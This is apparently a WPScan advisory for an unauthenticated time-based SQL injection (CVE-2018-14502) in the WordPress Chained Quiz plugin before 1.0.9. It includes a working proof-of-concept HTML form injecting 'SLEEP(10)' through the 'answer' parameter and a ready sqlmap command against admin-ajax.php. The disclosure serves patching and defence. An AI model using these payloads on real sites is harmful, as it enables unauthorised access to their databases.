Chained Quiz <= 1.0.8 - Unauthenticated SQL Injection



Description
WordPress Plugin Plugin Chained Quiz before 1.0.9 allows remote unauthenticated users to execute arbitrary SQL commands via the 'answer' and 'answers' parameters.

Technical details:

Chained Quiz appears to be vulnerable to time-based SQL-Injection.
The issue lies on the "$answer" backend variable.
Privileges required: None
Proof of Concept
The following exploit will cause the SQL query to execute and sleep for 10 seconds:

<html>
  <body>
    <form action="http://target/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="answer" value="8 AND SLEEP(10)" />
      <input type="hidden" name="question&#95;id" value="194" />
      <input type="hidden" name="quiz&#95;id" value="581" />
      <input type="hidden" name="post&#95;id" value="3199" />
      <input type="hidden" name="question&#95;type" value="radio" />
      <input type="hidden" name="points" value="0" />
      <input type="hidden" name="action" value="chainedquiz&#95;ajax" />
      <input type="hidden" name="chainedquiz&#95;action" value="answer" />
      <input type="hidden" name="total&#95;questions" value="2" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


Using SQLMAP:

sqlmap -u "http://target/wp-admin/admin-ajax.php" --data="answer=1*&question_id=1&quiz_id=1&post_id=5&question_type=radio&points=0&action=chainedquiz_ajax&chainedquiz_action=answer&total_questions=1" --dbms=MySQL --technique T

Affects Plugin

fixed in version 1.0.9

References

CVE 2018-14502
URL https://plugins.trac.wordpress.org/browser/chained-quiz/trunk/readme.txt#L114

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Çlirim Emini
Submitter Website https://www.sentry.co.com/
Views 1551
Verified No
WPVDB ID 9112

Timeline

Publicly Published 2018-08-16 (3 months ago)
Added 2018-08-17 (3 months ago)
Last Updated 2018-08-29 (3 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.